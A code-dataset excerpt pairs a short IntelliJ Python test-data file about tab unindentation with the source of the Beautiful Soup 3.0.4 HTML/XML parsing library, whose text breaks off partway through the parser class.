| repo_name (stringlengths 5–100) | ref (stringlengths 12–67) | path (stringlengths 4–244) | copies (stringlengths 1–8) | content (stringlengths 0–1.05M, ⌀ = null) |
|---|---|---|---|---|
MichaelNedzelsky/intellij-community
|
refs/heads/master
|
python/testData/editing/unindentTab.before.py
|
83
|
#// python 3
class C:
def m(self): #// note: TABs instead of spaces
pass
|
nickbenes/GeoSense
|
refs/heads/master
|
public-build/lib/openlayers/OpenLayers-2.13.1/tools/BeautifulSoup.py
|
307
|
"""Beautiful Soup
Elixir and Tonic
"The Screen-Scraper's Friend"
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup parses a (possibly invalid) XML or HTML document into a
tree representation. It provides methods and Pythonic idioms that make
it easy to navigate, search, and modify the tree.
A well-formed XML/HTML document yields a well-formed data
structure. An ill-formed XML/HTML document yields a correspondingly
ill-formed data structure. If your document is only locally
well-formed, you can use this library to find and process the
well-formed part of it.
Beautiful Soup works with Python 2.2 and up. It has no external
dependencies, but you'll have more success at converting data to UTF-8
if you also install these three packages:
* chardet, for auto-detecting character encodings
http://chardet.feedparser.org/
* cjkcodecs and iconv_codec, which add more encodings to the ones supported
by stock Python.
http://cjkpython.i18n.org/
Beautiful Soup defines classes for two main parsing strategies:
* BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific
language that kind of looks like XML.
* BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid
or invalid. This class has web browser-like heuristics for
obtaining a sensible parse tree in the face of common HTML errors.
Beautiful Soup also defines a class (UnicodeDammit) for autodetecting
the encoding of an HTML or XML document, and converting it to
Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser.
For more than you ever wanted to know about Beautiful Soup, see the
documentation:
http://www.crummy.com/software/BeautifulSoup/documentation.html
"""
from __future__ import generators
__author__ = "Leonard Richardson (leonardr@segfault.org)"
__version__ = "3.0.4"
__copyright__ = "Copyright (c) 2004-2007 Leonard Richardson"
__license__ = "PSF"
from sgmllib import SGMLParser, SGMLParseError
import codecs
import types
import re
import sgmllib
try:
from htmlentitydefs import name2codepoint
except ImportError:
name2codepoint = {}
#This hack makes Beautiful Soup able to parse XML with namespaces
sgmllib.tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*')
DEFAULT_OUTPUT_ENCODING = "utf-8"
# First, the classes that represent markup elements.
class PageElement:
"""Contains the navigational information for some part of the page
(either a tag or a piece of text)"""
def setup(self, parent=None, previous=None):
"""Sets up the initial relations between this element and
other elements."""
self.parent = parent
self.previous = previous
self.next = None
self.previousSibling = None
self.nextSibling = None
if self.parent and self.parent.contents:
self.previousSibling = self.parent.contents[-1]
self.previousSibling.nextSibling = self
def replaceWith(self, replaceWith):
oldParent = self.parent
myIndex = self.parent.contents.index(self)
if hasattr(replaceWith, 'parent') and replaceWith.parent == self.parent:
# We're replacing this element with one of its siblings.
index = self.parent.contents.index(replaceWith)
if index and index < myIndex:
# Furthermore, it comes before this element. That
# means that when we extract it, the index of this
# element will change.
myIndex = myIndex - 1
self.extract()
oldParent.insert(myIndex, replaceWith)
def extract(self):
"""Destructively rips this element out of the tree."""
if self.parent:
try:
self.parent.contents.remove(self)
except ValueError:
pass
#Find the two elements that would be next to each other if
#this element (and any children) hadn't been parsed. Connect
#the two.
lastChild = self._lastRecursiveChild()
nextElement = lastChild.next
if self.previous:
self.previous.next = nextElement
if nextElement:
nextElement.previous = self.previous
self.previous = None
lastChild.next = None
self.parent = None
if self.previousSibling:
self.previousSibling.nextSibling = self.nextSibling
if self.nextSibling:
self.nextSibling.previousSibling = self.previousSibling
self.previousSibling = self.nextSibling = None
def _lastRecursiveChild(self):
"Finds the last element beneath this object to be parsed."
lastChild = self
while hasattr(lastChild, 'contents') and lastChild.contents:
lastChild = lastChild.contents[-1]
return lastChild
def insert(self, position, newChild):
if (isinstance(newChild, basestring)
or isinstance(newChild, unicode)) \
and not isinstance(newChild, NavigableString):
newChild = NavigableString(newChild)
position = min(position, len(self.contents))
if hasattr(newChild, 'parent') and newChild.parent != None:
# We're 'inserting' an element that's already one
# of this object's children.
if newChild.parent == self:
index = self.find(newChild)
if index and index < position:
# Furthermore we're moving it further down the
# list of this object's children. That means that
# when we extract this element, our target index
# will jump down one.
position = position - 1
newChild.extract()
newChild.parent = self
previousChild = None
if position == 0:
newChild.previousSibling = None
newChild.previous = self
else:
previousChild = self.contents[position-1]
newChild.previousSibling = previousChild
newChild.previousSibling.nextSibling = newChild
newChild.previous = previousChild._lastRecursiveChild()
if newChild.previous:
newChild.previous.next = newChild
newChildsLastElement = newChild._lastRecursiveChild()
if position >= len(self.contents):
newChild.nextSibling = None
parent = self
parentsNextSibling = None
while not parentsNextSibling:
parentsNextSibling = parent.nextSibling
parent = parent.parent
if not parent: # This is the last element in the document.
break
if parentsNextSibling:
newChildsLastElement.next = parentsNextSibling
else:
newChildsLastElement.next = None
else:
nextChild = self.contents[position]
newChild.nextSibling = nextChild
if newChild.nextSibling:
newChild.nextSibling.previousSibling = newChild
newChildsLastElement.next = nextChild
if newChildsLastElement.next:
newChildsLastElement.next.previous = newChildsLastElement
self.contents.insert(position, newChild)
def findNext(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the first item that matches the given criteria and
appears after this Tag in the document."""
return self._findOne(self.findAllNext, name, attrs, text, **kwargs)
def findAllNext(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns all items that match the given criteria and appear
after this Tag in the document."""
return self._findAll(name, attrs, text, limit, self.nextGenerator, **kwargs)
def findNextSibling(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears after this Tag in the document."""
return self._findOne(self.findNextSiblings, name, attrs, text,
**kwargs)
def findNextSiblings(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns the siblings of this Tag that match the given
criteria and appear after this Tag in the document."""
return self._findAll(name, attrs, text, limit,
self.nextSiblingGenerator, **kwargs)
fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x
def findPrevious(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the first item that matches the given criteria and
appears before this Tag in the document."""
return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs)
def findAllPrevious(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns all items that match the given criteria and appear
before this Tag in the document."""
return self._findAll(name, attrs, text, limit, self.previousGenerator,
**kwargs)
fetchPrevious = findAllPrevious # Compatibility with pre-3.x
def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears before this Tag in the document."""
return self._findOne(self.findPreviousSiblings, name, attrs, text,
**kwargs)
def findPreviousSiblings(self, name=None, attrs={}, text=None,
limit=None, **kwargs):
"""Returns the siblings of this Tag that match the given
criteria and appear before this Tag in the document."""
return self._findAll(name, attrs, text, limit,
self.previousSiblingGenerator, **kwargs)
fetchPreviousSiblings = findPreviousSiblings # Compatibility with pre-3.x
def findParent(self, name=None, attrs={}, **kwargs):
"""Returns the closest parent of this Tag that matches the given
criteria."""
# NOTE: We can't use _findOne because findParents takes a different
# set of arguments.
r = None
l = self.findParents(name, attrs, 1)
if l:
r = l[0]
return r
def findParents(self, name=None, attrs={}, limit=None, **kwargs):
"""Returns the parents of this Tag that match the given
criteria."""
return self._findAll(name, attrs, None, limit, self.parentGenerator,
**kwargs)
fetchParents = findParents # Compatibility with pre-3.x
#These methods do the real heavy lifting.
def _findOne(self, method, name, attrs, text, **kwargs):
r = None
l = method(name, attrs, text, 1, **kwargs)
if l:
r = l[0]
return r
def _findAll(self, name, attrs, text, limit, generator, **kwargs):
"Iterates over a generator looking for things that match."
if isinstance(name, SoupStrainer):
strainer = name
else:
# Build a SoupStrainer
strainer = SoupStrainer(name, attrs, text, **kwargs)
results = ResultSet(strainer)
g = generator()
while True:
try:
i = g.next()
except StopIteration:
break
if i:
found = strainer.search(i)
if found:
results.append(found)
if limit and len(results) >= limit:
break
return results
#These Generators can be used to navigate starting from both
#NavigableStrings and Tags.
def nextGenerator(self):
i = self
while i:
i = i.next
yield i
def nextSiblingGenerator(self):
i = self
while i:
i = i.nextSibling
yield i
def previousGenerator(self):
i = self
while i:
i = i.previous
yield i
def previousSiblingGenerator(self):
i = self
while i:
i = i.previousSibling
yield i
def parentGenerator(self):
i = self
while i:
i = i.parent
yield i
# Utility methods
def substituteEncoding(self, str, encoding=None):
encoding = encoding or "utf-8"
return str.replace("%SOUP-ENCODING%", encoding)
def toEncoding(self, s, encoding=None):
"""Encodes an object to a string in some encoding, or to Unicode.
."""
if isinstance(s, unicode):
if encoding:
s = s.encode(encoding)
elif isinstance(s, str):
if encoding:
s = s.encode(encoding)
else:
s = unicode(s)
else:
if encoding:
s = self.toEncoding(str(s), encoding)
else:
s = unicode(s)
return s
class NavigableString(unicode, PageElement):
def __getattr__(self, attr):
"""text.string gives you text. This is for backwards
compatibility for Navigable*String, but for CData* it lets you
get the string without the CData wrapper."""
if attr == 'string':
return self
else:
raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr)
def __unicode__(self):
return self.__str__(None)
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
if encoding:
return self.encode(encoding)
else:
return self
class CData(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
return "<![CDATA[%s]]>" % NavigableString.__str__(self, encoding)
class ProcessingInstruction(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
output = self
if "%SOUP-ENCODING%" in output:
output = self.substituteEncoding(output, encoding)
return "<?%s?>" % self.toEncoding(output, encoding)
class Comment(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
return "<!--%s-->" % NavigableString.__str__(self, encoding)
class Declaration(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
return "<!%s>" % NavigableString.__str__(self, encoding)
class Tag(PageElement):
"""Represents a found HTML tag with its attributes and contents."""
XML_SPECIAL_CHARS_TO_ENTITIES = { "'" : "squot",
'"' : "quote",
"&" : "amp",
"<" : "lt",
">" : "gt" }
def __init__(self, parser, name, attrs=None, parent=None,
previous=None):
"Basic constructor."
# We don't actually store the parser object: that lets extracted
# chunks be garbage-collected
self.parserClass = parser.__class__
self.isSelfClosing = parser.isSelfClosingTag(name)
self.name = name
if attrs == None:
attrs = []
self.attrs = attrs
self.contents = []
self.setup(parent, previous)
self.hidden = False
self.containsSubstitutions = False
def get(self, key, default=None):
"""Returns the value of the 'key' attribute for the tag, or
the value given for 'default' if it doesn't have that
attribute."""
return self._getAttrMap().get(key, default)
def has_key(self, key):
return self._getAttrMap().has_key(key)
def __getitem__(self, key):
"""tag[key] returns the value of the 'key' attribute for the tag,
and throws an exception if it's not there."""
return self._getAttrMap()[key]
def __iter__(self):
"Iterating over a tag iterates over its contents."
return iter(self.contents)
def __len__(self):
"The length of a tag is the length of its list of contents."
return len(self.contents)
def __contains__(self, x):
return x in self.contents
def __nonzero__(self):
"A tag is non-None even if it has no contents."
return True
def __setitem__(self, key, value):
"""Setting tag[key] sets the value of the 'key' attribute for the
tag."""
self._getAttrMap()
self.attrMap[key] = value
found = False
for i in range(0, len(self.attrs)):
if self.attrs[i][0] == key:
self.attrs[i] = (key, value)
found = True
if not found:
self.attrs.append((key, value))
self._getAttrMap()[key] = value
def __delitem__(self, key):
"Deleting tag[key] deletes all 'key' attributes for the tag."
for item in self.attrs:
if item[0] == key:
self.attrs.remove(item)
#We don't break because bad HTML can define the same
#attribute multiple times.
self._getAttrMap()
if self.attrMap.has_key(key):
del self.attrMap[key]
def __call__(self, *args, **kwargs):
"""Calling a tag like a function is the same as calling its
findAll() method. Eg. tag('a') returns a list of all the A tags
found within this tag."""
return apply(self.findAll, args, kwargs)
def __getattr__(self, tag):
#print "Getattr %s.%s" % (self.__class__, tag)
if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3:
return self.find(tag[:-3])
elif tag.find('__') != 0:
return self.find(tag)
def __eq__(self, other):
"""Returns true iff this tag has the same name, the same attributes,
and the same contents (recursively) as the given tag.
NOTE: right now this will return false if two tags have the
same attributes in a different order. Should this be fixed?"""
if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other):
return False
for i in range(0, len(self.contents)):
if self.contents[i] != other.contents[i]:
return False
return True
def __ne__(self, other):
"""Returns true iff this tag is not identical to the other tag,
as defined in __eq__."""
return not self == other
def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING):
"""Renders this tag as a string."""
return self.__str__(encoding)
def __unicode__(self):
return self.__str__(None)
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING,
prettyPrint=False, indentLevel=0):
"""Returns a string or Unicode representation of this tag and
its contents. To get Unicode, pass None for encoding.
NOTE: since Python's HTML parser consumes whitespace, this
method is not certain to reproduce the whitespace present in
the original string."""
encodedName = self.toEncoding(self.name, encoding)
attrs = []
if self.attrs:
for key, val in self.attrs:
fmt = '%s="%s"'
if isString(val):
if self.containsSubstitutions and '%SOUP-ENCODING%' in val:
val = self.substituteEncoding(val, encoding)
# The attribute value either:
#
# * Contains no embedded double quotes or single quotes.
# No problem: we enclose it in double quotes.
# * Contains embedded single quotes. No problem:
# double quotes work here too.
# * Contains embedded double quotes. No problem:
# we enclose it in single quotes.
# * Embeds both single _and_ double quotes. This
# can't happen naturally, but it can happen if
# you modify an attribute value after parsing
# the document. Now we have a bit of a
# problem. We solve it by enclosing the
# attribute in single quotes, and escaping any
# embedded single quotes to XML entities.
if '"' in val:
fmt = "%s='%s'"
# This can't happen naturally, but it can happen
# if you modify an attribute value after parsing.
if "'" in val:
val = val.replace("'", "&squot;")
# Now we're okay w/r/t quotes. But the attribute
# value might also contain angle brackets, or
# ampersands that aren't part of entities. We need
# to escape those to XML entities too.
val = re.sub("([<>]|&(?![^\s]+;))",
lambda x: "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";",
val)
attrs.append(fmt % (self.toEncoding(key, encoding),
self.toEncoding(val, encoding)))
close = ''
closeTag = ''
if self.isSelfClosing:
close = ' /'
else:
closeTag = '</%s>' % encodedName
indentTag, indentContents = 0, 0
if prettyPrint:
indentTag = indentLevel
space = (' ' * (indentTag-1))
indentContents = indentTag + 1
contents = self.renderContents(encoding, prettyPrint, indentContents)
if self.hidden:
s = contents
else:
s = []
attributeString = ''
if attrs:
attributeString = ' ' + ' '.join(attrs)
if prettyPrint:
s.append(space)
s.append('<%s%s%s>' % (encodedName, attributeString, close))
if prettyPrint:
s.append("\n")
s.append(contents)
if prettyPrint and contents and contents[-1] != "\n":
s.append("\n")
if prettyPrint and closeTag:
s.append(space)
s.append(closeTag)
if prettyPrint and closeTag and self.nextSibling:
s.append("\n")
s = ''.join(s)
return s
def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING):
return self.__str__(encoding, True)
def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING,
prettyPrint=False, indentLevel=0):
"""Renders the contents of this tag as a string in the given
encoding. If encoding is None, returns a Unicode string."""
s=[]
for c in self:
text = None
if isinstance(c, NavigableString):
text = c.__str__(encoding)
elif isinstance(c, Tag):
s.append(c.__str__(encoding, prettyPrint, indentLevel))
if text and prettyPrint:
text = text.strip()
if text:
if prettyPrint:
s.append(" " * (indentLevel-1))
s.append(text)
if prettyPrint:
s.append("\n")
return ''.join(s)
#Soup methods
def find(self, name=None, attrs={}, recursive=True, text=None,
**kwargs):
"""Return only the first child of this Tag matching the given
criteria."""
r = None
l = self.findAll(name, attrs, recursive, text, 1, **kwargs)
if l:
r = l[0]
return r
findChild = find
def findAll(self, name=None, attrs={}, recursive=True, text=None,
limit=None, **kwargs):
"""Extracts a list of Tag objects that match the given
criteria. You can specify the name of the Tag and any
attributes you want the Tag to have.
The value of a key-value pair in the 'attrs' map can be a
string, a list of strings, a regular expression object, or a
callable that takes a string and returns whether or not the
string matches for some custom definition of 'matches'. The
same is true of the tag name."""
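# Illustrative examples (hypothetical soup and attribute values) of the
# match forms described in the docstring above -- string, list, regular
# expression, and callable:
#   soup.findAll('a', attrs={'class': 'external'})           # exact string
#   soup.findAll(['h1', 'h2', 'h3'])                          # any name in a list
#   soup.findAll(re.compile('^h[1-6]$'))                      # regexp on the name
#   soup.findAll(attrs={'id': lambda v: v and len(v) > 3})    # callable predicate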
generator = self.recursiveChildGenerator
if not recursive:
generator = self.childGenerator
return self._findAll(name, attrs, text, limit, generator, **kwargs)
findChildren = findAll
# Pre-3.x compatibility methods
first = find
fetch = findAll
def fetchText(self, text=None, recursive=True, limit=None):
return self.findAll(text=text, recursive=recursive, limit=limit)
def firstText(self, text=None, recursive=True):
return self.find(text=text, recursive=recursive)
#Utility methods
def append(self, tag):
"""Appends the given tag to the contents of this tag."""
self.contents.append(tag)
#Private methods
def _getAttrMap(self):
"""Initializes a map representation of this tag's attributes,
if not already initialized."""
if not getattr(self, 'attrMap'):
self.attrMap = {}
for (key, value) in self.attrs:
self.attrMap[key] = value
return self.attrMap
#Generator methods
def childGenerator(self):
for i in range(0, len(self.contents)):
yield self.contents[i]
raise StopIteration
def recursiveChildGenerator(self):
stack = [(self, 0)]
while stack:
tag, start = stack.pop()
if isinstance(tag, Tag):
for i in range(start, len(tag.contents)):
a = tag.contents[i]
yield a
if isinstance(a, Tag) and tag.contents:
if i < len(tag.contents) - 1:
stack.append((tag, i+1))
stack.append((a, 0))
break
raise StopIteration
# Next, a couple classes to represent queries and their results.
class SoupStrainer:
"""Encapsulates a number of ways of matching a markup element (tag or
text)."""
def __init__(self, name=None, attrs={}, text=None, **kwargs):
self.name = name
if isString(attrs):
kwargs['class'] = attrs
attrs = None
if kwargs:
if attrs:
attrs = attrs.copy()
attrs.update(kwargs)
else:
attrs = kwargs
self.attrs = attrs
self.text = text
def __str__(self):
if self.text:
return self.text
else:
return "%s|%s" % (self.name, self.attrs)
def searchTag(self, markupName=None, markupAttrs={}):
found = None
markup = None
if isinstance(markupName, Tag):
markup = markupName
markupAttrs = markup
callFunctionWithTagData = callable(self.name) \
and not isinstance(markupName, Tag)
if (not self.name) \
or callFunctionWithTagData \
or (markup and self._matches(markup, self.name)) \
or (not markup and self._matches(markupName, self.name)):
if callFunctionWithTagData:
match = self.name(markupName, markupAttrs)
else:
match = True
markupAttrMap = None
for attr, matchAgainst in self.attrs.items():
if not markupAttrMap:
if hasattr(markupAttrs, 'get'):
markupAttrMap = markupAttrs
else:
markupAttrMap = {}
for k,v in markupAttrs:
markupAttrMap[k] = v
attrValue = markupAttrMap.get(attr)
if not self._matches(attrValue, matchAgainst):
match = False
break
if match:
if markup:
found = markup
else:
found = markupName
return found
def search(self, markup):
#print 'looking for %s in %s' % (self, markup)
found = None
# If given a list of items, scan it for a text element that
# matches.
if isList(markup) and not isinstance(markup, Tag):
for element in markup:
if isinstance(element, NavigableString) \
and self.search(element):
found = element
break
# If it's a Tag, make sure its name or attributes match.
# Don't bother with Tags if we're searching for text.
elif isinstance(markup, Tag):
if not self.text:
found = self.searchTag(markup)
# If it's text, make sure the text matches.
elif isinstance(markup, NavigableString) or \
isString(markup):
if self._matches(markup, self.text):
found = markup
else:
raise Exception, "I don't know how to match against a %s" \
% markup.__class__
return found
def _matches(self, markup, matchAgainst):
#print "Matching %s against %s" % (markup, matchAgainst)
result = False
if matchAgainst == True and type(matchAgainst) == types.BooleanType:
result = markup != None
elif callable(matchAgainst):
result = matchAgainst(markup)
else:
#Custom match methods take the tag as an argument, but all
#other ways of matching match the tag name as a string.
if isinstance(markup, Tag):
markup = markup.name
if markup and not isString(markup):
markup = unicode(markup)
#Now we know that chunk is either a string, or None.
if hasattr(matchAgainst, 'match'):
# It's a regexp object.
result = markup and matchAgainst.search(markup)
elif isList(matchAgainst):
result = markup in matchAgainst
elif hasattr(matchAgainst, 'items'):
result = markup.has_key(matchAgainst)
elif matchAgainst and isString(markup):
if isinstance(markup, unicode):
matchAgainst = unicode(matchAgainst)
else:
matchAgainst = str(matchAgainst)
if not result:
result = matchAgainst == markup
return result
class ResultSet(list):
"""A ResultSet is just a list that keeps track of the SoupStrainer
that created it."""
def __init__(self, source):
list.__init__([])
self.source = source
# Now, some helper functions.
def isList(l):
"""Convenience method that works with all 2.x versions of Python
to determine whether or not something is listlike."""
return hasattr(l, '__iter__') \
or (type(l) in (types.ListType, types.TupleType))
def isString(s):
"""Convenience method that works with all 2.x versions of Python
to determine whether or not something is stringlike."""
try:
return isinstance(s, unicode) or isinstance(s, basestring)
except NameError:
return isinstance(s, str)
def buildTagMap(default, *args):
"""Turns a list of maps, lists, or scalars into a single map.
Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and
NESTING_RESET_TAGS maps out of lists and partial maps."""
built = {}
for portion in args:
if hasattr(portion, 'items'):
#It's a map. Merge it.
for k,v in portion.items():
built[k] = v
elif isList(portion):
#It's a list. Map each item to the default.
for k in portion:
built[k] = default
else:
#It's a scalar. Map it to the default.
built[portion] = default
return built
# Now, the parser classes.
class BeautifulStoneSoup(Tag, SGMLParser):
"""This class contains the basic parser and search code. It defines
a parser that knows nothing about tag behavior except for the
following:
You can't close a tag without closing all the tags it encloses.
That is, "<foo><bar></foo>" actually means
"<foo><bar></bar></foo>".
[Another possible explanation is "<foo><bar /></foo>", but since
this class defines no SELF_CLOSING_TAGS, it will never use that
explanation.]
This class is useful for parsing XML or made-up markup languages,
or when BeautifulSoup makes an assumption counter to what you were
expecting."""
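# A sketch of the behavior described above (not part of the original
# source): because no SELF_CLOSING_TAGS are defined here, the fragment
# "<foo><bar></foo>" parses as nested tags:
#   BeautifulStoneSoup("<foo><bar></foo>")  ->  <foo><bar></bar></foo>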
XML_ENTITY_LIST = {}
for i in Tag.XML_SPECIAL_CHARS_TO_ENTITIES.values():
XML_ENTITY_LIST[i] = True
SELF_CLOSING_TAGS = {}
NESTABLE_TAGS = {}
RESET_NESTING_TAGS = {}
QUOTE_TAGS = {}
MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'),
lambda x: x.group(1) + ' />'),
(re.compile('<!\s+([^<>]*)>'),
lambda x: '<!' + x.group(1) + '>')
]
ROOT_TAG_NAME = u'[document]'
HTML_ENTITIES = "html"
XML_ENTITIES = "xml"
def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None,
markupMassage=True, smartQuotesTo=XML_ENTITIES,
convertEntities=None, selfClosingTags=None):
"""The Soup object is initialized as the 'root tag', and the
provided markup (which can be a string or a file-like object)
is fed into the underlying parser.
sgmllib will process most bad HTML, and the BeautifulSoup
class has some tricks for dealing with some HTML that kills
sgmllib, but Beautiful Soup can nonetheless choke or lose data
if your data uses self-closing tags or declarations
incorrectly.
By default, Beautiful Soup uses regexes to sanitize input,
avoiding the vast majority of these problems. If the problems
don't apply to you, pass in False for markupMassage, and
you'll get better performance.
The default parser massage techniques fix the two most common
instances of invalid HTML that choke sgmllib:
<br/> (No space between name of closing tag and tag close)
<! --Comment--> (Extraneous whitespace in declaration)
You can pass in a custom list of (RE object, replace method)
tuples to get Beautiful Soup to scrub your input the way you
want."""
self.parseOnlyThese = parseOnlyThese
self.fromEncoding = fromEncoding
self.smartQuotesTo = smartQuotesTo
self.convertEntities = convertEntities
if self.convertEntities:
# It doesn't make sense to convert encoded characters to
# entities even while you're converting entities to Unicode.
# Just convert it all to Unicode.
self.smartQuotesTo = None
self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags)
SGMLParser.__init__(self)
if hasattr(markup, 'read'): # It's a file-type object.
markup = markup.read()
self.markup = markup
self.markupMassage = markupMassage
try:
self._feed()
except StopParsing:
pass
self.markup = None # The markup can now be GCed
def _feed(self, inDocumentEncoding=None):
# Convert the document to Unicode.
markup = self.markup
if isinstance(markup, unicode):
if not hasattr(self, 'originalEncoding'):
self.originalEncoding = None
else:
dammit = UnicodeDammit\
(markup, [self.fromEncoding, inDocumentEncoding],
smartQuotesTo=self.smartQuotesTo)
markup = dammit.unicode
self.originalEncoding = dammit.originalEncoding
if markup:
if self.markupMassage:
if not isList(self.markupMassage):
self.markupMassage = self.MARKUP_MASSAGE
for fix, m in self.markupMassage:
markup = fix.sub(m, markup)
self.reset()
SGMLParser.feed(self, markup)
# Close out any unfinished strings and close all the open tags.
self.endData()
while self.currentTag.name != self.ROOT_TAG_NAME:
self.popTag()
def __getattr__(self, methodName):
"""This method routes method call requests to either the SGMLParser
superclass or the Tag superclass, depending on the method name."""
#print "__getattr__ called on %s.%s" % (self.__class__, methodName)
if methodName.find('start_') == 0 or methodName.find('end_') == 0 \
or methodName.find('do_') == 0:
return SGMLParser.__getattr__(self, methodName)
elif methodName.find('__') != 0:
return Tag.__getattr__(self, methodName)
else:
raise AttributeError
def isSelfClosingTag(self, name):
"""Returns true iff the given string is the name of a
self-closing tag according to this parser."""
return self.SELF_CLOSING_TAGS.has_key(name) \
or self.instanceSelfClosingTags.has_key(name)
def reset(self):
Tag.__init__(self, self, self.ROOT_TAG_NAME)
self.hidden = 1
SGMLParser.reset(self)
self.currentData = []
self.currentTag = None
self.tagStack = []
self.quoteStack = []
self.pushTag(self)
def popTag(self):
tag = self.tagStack.pop()
# Tags with just one string-owning child get the child as a
# 'string' property, so that soup.tag.string is shorthand for
# soup.tag.contents[0]
if len(self.currentTag.contents) == 1 and \
isinstance(self.currentTag.contents[0], NavigableString):
self.currentTag.string = self.currentTag.contents[0]
#print "Pop", tag.name
if self.tagStack:
self.currentTag = self.tagStack[-1]
return self.currentTag
def pushTag(self, tag):
#print "Push", tag.name
if self.currentTag:
self.currentTag.append(tag)
self.tagStack.append(tag)
self.currentTag = self.tagStack[-1]
def endData(self, containerClass=NavigableString):
if self.currentData:
currentData = ''.join(self.currentData)
if not currentData.strip():
if '\n' in currentData:
currentData = '\n'
else:
currentData = ' '
self.currentData = []
if self.parseOnlyThese and len(self.tagStack) <= 1 and \
(not self.parseOnlyThese.text or \
not self.parseOnlyThese.search(currentData)):
return
o = containerClass(currentData)
o.setup(self.currentTag, self.previous)
if self.previous:
self.previous.next = o
self.previous = o
self.currentTag.contents.append(o)
def _popToTag(self, name, inclusivePop=True):
"""Pops the tag stack up to and including the most recent
instance of the given tag. If inclusivePop is false, pops the tag
stack up to but *not* including the most recent instance of
the given tag."""
#print "Popping to %s" % name
if name == self.ROOT_TAG_NAME:
return
numPops = 0
mostRecentTag = None
for i in range(len(self.tagStack)-1, 0, -1):
if name == self.tagStack[i].name:
numPops = len(self.tagStack)-i
break
if not inclusivePop:
numPops = numPops - 1
for i in range(0, numPops):
mostRecentTag = self.popTag()
return mostRecentTag
def _smartPop(self, name):
"""We need to pop up to the previous tag of this type, unless
one of this tag's nesting reset triggers comes between this
tag and the previous tag of this type, OR unless this tag is a
generic nesting trigger and another generic nesting trigger
comes between this tag and the previous tag of this type.
Examples:
<p>Foo<b>Bar<p> should pop to 'p', not 'b'.
<p>Foo<table>Bar<p> should pop to 'table', not 'p'.
<p>Foo<table><tr>Bar<p> should pop to 'tr', not 'p'.
<p>Foo<b>Bar<p> should pop to 'p', not 'b'.
<li><ul><li> *<li>* should pop to 'ul', not the first 'li'.
<tr><table><tr> *<tr>* should pop to 'table', not the first 'tr'
<td><tr><td> *<td>* should pop to 'tr', not the first 'td'
"""
nestingResetTriggers = self.NESTABLE_TAGS.get(name)
isNestable = nestingResetTriggers != None
isResetNesting = self.RESET_NESTING_TAGS.has_key(name)
popTo = None
inclusive = True
for i in range(len(self.tagStack)-1, 0, -1):
p = self.tagStack[i]
if (not p or p.name == name) and not isNestable:
#Non-nestable tags get popped to the top or to their
#last occurrence.
popTo = name
break
if (nestingResetTriggers != None
and p.name in nestingResetTriggers) \
or (nestingResetTriggers == None and isResetNesting
and self.RESET_NESTING_TAGS.has_key(p.name)):
#If we encounter one of the nesting reset triggers
#peculiar to this tag, or we encounter another tag
#that causes nesting to reset, pop up to but not
#including that tag.
popTo = p.name
inclusive = False
break
p = p.parent
if popTo:
self._popToTag(popTo, inclusive)
def unknown_starttag(self, name, attrs, selfClosing=0):
#print "Start tag %s: %s" % (name, attrs)
if self.quoteStack:
#This is not a real tag.
#print "<%s> is not real!" % name
attrs = ''.join(map(lambda(x, y): ' %s="%s"' % (x, y), attrs))
self.handle_data('<%s%s>' % (name, attrs))
return
self.endData()
if not self.isSelfClosingTag(name) and not selfClosing:
self._smartPop(name)
if self.parseOnlyThese and len(self.tagStack) <= 1 \
and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)):
return
tag = Tag(self, name, attrs, self.currentTag, self.previous)
if self.previous:
self.previous.next = tag
self.previous = tag
self.pushTag(tag)
if selfClosing or self.isSelfClosingTag(name):
self.popTag()
if name in self.QUOTE_TAGS:
#print "Beginning quote (%s)" % name
self.quoteStack.append(name)
self.literal = 1
return tag
def unknown_endtag(self, name):
#print "End tag %s" % name
if self.quoteStack and self.quoteStack[-1] != name:
#This is not a real end tag.
#print "</%s> is not real!" % name
self.handle_data('</%s>' % name)
return
self.endData()
self._popToTag(name)
if self.quoteStack and self.quoteStack[-1] == name:
self.quoteStack.pop()
self.literal = (len(self.quoteStack) > 0)
def handle_data(self, data):
self.currentData.append(data)
def _toStringSubclass(self, text, subclass):
"""Adds a certain piece of text to the tree as a NavigableString
subclass."""
self.endData()
self.handle_data(text)
self.endData(subclass)
def handle_pi(self, text):
"""Handle a processing instruction as a ProcessingInstruction
object, possibly one with a %SOUP-ENCODING% slot into which an
encoding will be plugged later."""
if text[:3] == "xml":
text = "xml version='1.0' encoding='%SOUP-ENCODING%'"
self._toStringSubclass(text, ProcessingInstruction)
def handle_comment(self, text):
"Handle comments as Comment objects."
self._toStringSubclass(text, Comment)
def handle_charref(self, ref):
"Handle character references as data."
